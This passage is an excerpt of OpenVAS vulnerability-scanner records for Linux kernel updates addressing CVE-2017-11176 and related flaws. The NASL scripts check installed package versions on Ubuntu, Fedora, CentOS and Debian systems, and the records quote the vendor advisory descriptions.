isdpkgvuln(pkg:\"linux-image-3.13.0-135-powerpc-e500mc\", ver:\"3.13.0-135.184\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-135-powerpc-smp\", ver:\"3.13.0-135.184\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-135-powerpc64-emb\", ver:\"3.13.0-135.184\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-135-powerpc64-smp\", ver:\"3.13.0-135.184\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"3.13.0.135.144\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"3.13.0.135.144\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"3.13.0.135.144\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500\", ver:\"3.13.0.135.144\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"3.13.0.135.144\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"3.13.0.135.144\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"3.13.0.135.144\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"3.13.0.135.144\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11176"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-07-24T00:00:00", "id": "OPENVAS:1361412562310872902", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872902", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2017-98548b066b", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_98548b066b_kernel_fc25.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2017-98548b066b\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872902\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-07-24 05:47:57 +0200 (Mon, 24 Jul 2017)\");\n script_cve_id(\"CVE-2017-11176\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2017-98548b066b\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-98548b066b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/G6AFLVBCHR5PPAU3B5L4CXVF33MJPH5L\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.11.11~200.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11176"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-08-04T00:00:00", "id": "OPENVAS:1361412562310873079", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873079", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2017-deb70b495e", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_deb70b495e_kernel_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2017-deb70b495e\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873079\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-04 12:47:54 +0530 (Fri, 04 Aug 2017)\");\n script_cve_id(\"CVE-2017-11176\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2017-deb70b495e\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-deb70b495e\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWOR5JYW74K7RGJJK2OF34VIZXZGI36S\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.11.11~300.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11176", "CVE-2017-9074", "CVE-2017-7542"], "description": "Check the version of kernel", "modified": "2019-03-08T00:00:00", "published": "2018-02-01T00:00:00", "id": "OPENVAS:1361412562310882840", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882840", "type": "openvas", "title": "CentOS Update for kernel CESA-2018:0169 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_CESA-2018_0169_kernel_centos6.nasl 14058 2019-03-08 13:25:52Z cfischer $\n#\n# CentOS Update for kernel CESA-2018:0169 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882840\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-02-01 07:49:11 +0100 (Thu, 01 Feb 2018)\");\n script_cve_id(\"CVE-2017-7542\", \"CVE-2017-9074\", \"CVE-2017-11176\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for kernel CESA-2018:0169 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of kernel\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux\nkernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n * An integer overflow vulnerability in ip6_find_1stfragopt() function was\nfound. A local attacker that has privileges (of CAP_NET_RAW) to open raw\nsocket can cause an infinite loop inside the ip6_find_1stfragopt()\nfunction. (CVE-2017-7542, Moderate)\n\n * The IPv6 fragmentation implementation in the Linux kernel does not\nconsider that the nexthdr field may be associated with an invalid option,\nwhich allows local users to cause a denial of service (out-of-bounds read\nand BUG) or possibly have unspecified other impact via crafted socket and\nsend system calls. Due to the nature of the flaw, privilege escalation\ncannot be fully ruled out, although we believe it is unlikely.\n(CVE-2017-9074, Moderate)\n\n * A use-after-free flaw was found in the Netlink functionality of the Linux\nkernel networking subsystem. Due to the insufficient cleanup in the\nmq_notify function, a local attacker could potentially use this flaw to\nescalate their privileges on the system. (CVE-2017-11176, Moderate)\n\nBug Fix(es):\n\n * Previously, the default timeout and retry settings in the VMBus driver\nwere insufficient in some cases, for example when a Hyper-V host was under\na significant load. Consequently, in Windows Server 2016, Hyper-V Server\n2016, and Windows Azure Platform, when running a Red Hat Enterprise Linux\nGuest on the Hyper-V hypervisor, the guest failed to boot or booted with\ncertain Hyper-V devices missing. This update alters the timeout and retry\nsettings in VMBus, and Red Hat Enterprise Linux guests now boot as expected\nunder the described conditions. (BZ#1506145)\n\n * Previously, an incorrect external declaration in the be2iscsi driver\ncaused a kernel panic when using the systool utility. With this update, the\nexternal declaration in be2iscsi has been fixed, and the kernel no longer\npanics when using systool. (BZ#1507512)\n\n * Under high usage of the NFSD file system and memory pressure, if many\ntasks in the Linux kernel attempted to obtain the global spinlock to clean\nthe Duplicate Reply Cache (DRC), these tasks stayed in an active wait in\nthe nfsd_reply_cache_shrink() function for up to 99% of time. Consequently,\na high load average occurred. This update fixes the bug by separating the\nDRC in several parts, each with an independent spinlock. As a result, the\nload and CPU utilization is no longer excessive under the described\ncircumstances. (BZ#1509876)\n\n * When attempting to attach multiple SCSI devices simultaneously, Red Hat\nEnterprise Linux 6.9 on IBM z Systems sometimes became unresponsive. This\nupdate fixes the zfcp ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"kernel on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2018:0169\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2018-January/022756.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~696.20.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~2.6.32~696.20.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~696.20.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~696.20.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~696.20.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~696.20.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~696.20.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~696.20.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~696.20.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~2.6.32~696.20.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11176", "CVE-2017-7346", "CVE-2017-10810", "CVE-2017-7533", "CVE-2017-10911", "CVE-2017-7482", "CVE-2017-7541", "CVE-2017-7542", "CVE-2017-9605", "CVE-2017-1000365"], "description": "Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-7346\nLi Qiang discovered that the DRM driver for VMware virtual GPUs does\nnot properly check user-controlled values in the\nvmw_surface_define_ioctl() functions for upper limits. A local user\ncan take advantage of this flaw to cause a denial of service.\n\nCVE-2017-7482\nShi Lei discovered that RxRPC Kerberos 5 ticket handling code does\nnot properly verify metadata, leading to information disclosure,\ndenial of service or potentially execution of arbitrary code.\n\nCVE-2017-7533\nFan Wu and Shixiong Zhao discovered a race condition between inotify\nevents and VFS rename operations allowing an unprivileged local\nattacker to cause a denial of service or escalate privileges.\n\nCVE-2017-7541\nA buffer overflow flaw in the Broadcom IEEE802.11n PCIe SoftMAC WLAN\ndriver could allow a local user to cause kernel memory corruption,\nleading to a denial of service or potentially privilege escalation.\n\nCVE-2017-7542\nAn integer overflow vulnerability in the ip6_find_1stfragopt()\nfunction was found allowing a local attacker with privileges to open\nraw sockets to cause a denial of service.\n\nCVE-2017-9605\nMurray McAllister discovered that the DRM driver for VMware virtual\nGPUs does not properly initialize memory, potentially allowing a\nlocal attacker to obtain sensitive information from uninitialized\nkernel memory via a crafted ioctl call.\n\nCVE-2017-10810\nLi Qiang discovered a memory leak flaw within the VirtIO GPU driver\nresulting in denial of service (memory consumption).\n\nCVE-2017-10911 /\nXSA-216\nAnthony Perard of Citrix discovered an information leak flaw in Xen\nblkif response handling, allowing a malicious unprivileged guest to\nobtain sensitive information from the host or other guests.\n\nCVE-2017-11176\nIt was discovered that the mq_notify() function does not set the\nsock pointer to NULL upon entry into the retry logic. An attacker\ncan take advantage of this flaw during a user-space close of a\nNetlink socket to cause a denial of service or potentially cause\nother impact.\n\nCVE-2017-1000365\nIt was discovered that argument and environment pointers are not\ntaken properly into account to the imposed size restrictions on\narguments and environmental strings passed through\nRLIMIT_STACK/RLIMIT_INFINITY. A local attacker can take advantage of\nthis flaw in conjunction with other flaws to execute arbitrary code.", "modified": "2019-03-18T00:00:00", "published": "2017-08-07T00:00:00", "id": "OPENVAS:1361412562310703927", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703927", "type": "openvas", "title": "Debian Security Advisory DSA 3927-1 (linux - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_3927.nasl 14280 2019-03-18 14:50:45Z cfischer $\n#\n# Auto-generated from advisory DSA 3927-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703927\");\n script_version(\"$Revision: 14280 $\");\n script_cve_id(\"CVE-2017-1000365\", \"CVE-2017-10810\", \"CVE-2017-10911\", \"CVE-2017-11176\", \"CVE-2017-7346\", \"CVE-2017-7482\", \"CVE-2017-7533\", \"CVE-2017-7541\", \"CVE-2017-7542\", \"CVE-2017-9605\");\n script_name(\"Debian Security Advisory DSA 3927-1 (linux - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:50:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-07 00:00:00 +0200 (Mon, 07 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3927.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"linux on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), these problems will be fixed in\na subsequent DSA.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 4.9.30-2+deb9u3.\n\nWe recommend that you upgrade your linux packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-7346\nLi Qiang discovered that the DRM driver for VMware virtual GPUs does\nnot properly check user-controlled values in the\nvmw_surface_define_ioctl() functions for upper limits. A local user\ncan take advantage of this flaw to cause a denial of service.\n\nCVE-2017-7482\nShi Lei discovered that RxRPC Kerberos 5 ticket handling code does\nnot properly verify metadata, leading to information disclosure,\ndenial of service or potentially execution of arbitrary code.\n\nCVE-2017-7533\nFan Wu and Shixiong Zhao discovered a race condition between inotify\nevents and VFS rename operations allowing an unprivileged local\nattacker to cause a denial of service or escalate privileges.\n\nCVE-2017-7541\nA buffer overflow flaw in the Broadcom IEEE802.11n PCIe SoftMAC WLAN\ndriver could allow a local user to cause kernel memory corruption,\nleading to a denial of service or potentially privilege escalation.\n\nCVE-2017-7542\nAn integer overflow vulnerability in the ip6_find_1stfragopt()\nfunction was found allowing a local attacker with privileges to open\nraw sockets to cause a denial of service.\n\nCVE-2017-9605\nMurray McAllister discovered that the DRM driver for VMware virtual\nGPUs does not properly initialize memory, potentially allowing a\nlocal attacker to obtain sensitive information from uninitialized\nkernel memory via a crafted ioctl call.\n\nCVE-2017-10810\nLi Qiang discovered a memory leak flaw within the VirtIO GPU driver\nresulting in denial of service (memory consumption).\n\nCVE-2017-10911 /\nXSA-216\nAnthony Perard of Citrix discovered an information leak flaw in Xen\nblkif response handling, allowing a malicious unprivileged guest to\nobtain sensitive information from the host or other guests.\n\nCVE-2017-11176\nIt was discovered that the mq_notify() function does not set the\nsock pointer to NULL upon entry into the retry logic. An attacker\ncan take advantage of this flaw during a user-space close of a\nNetlink socket to cause a denial of service or potentially cause\nother impact.\n\nCVE-2017-1000365\nIt was discovered that argument and environment pointers are not\ntaken properly into account to the imposed size restrictions on\narguments and environmental strings passed through\nRLIMIT_STACK/RLIMIT_INFINITY. A local attacker can take advantage of\nthis flaw in conjunction with other flaws to execute arbitrary code.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"hyperv-daemons\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcpupower-dev\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcpupower1\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libusbip-dev\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-6-arm\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-6-s390\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-6-x86\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-cpupower\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-doc-4.9\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-4kc-malta\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-5kc-malta\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-686\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-686-pae\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-amd64\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-arm64\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-armel\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-armhf\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-i386\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-mips\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-mips64el\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-mipsel\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-ppc64el\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-s390x\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-amd64\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-arm64\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-armmp\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-armmp-lpae\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-common\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-common-rt\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-loongson-3\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = 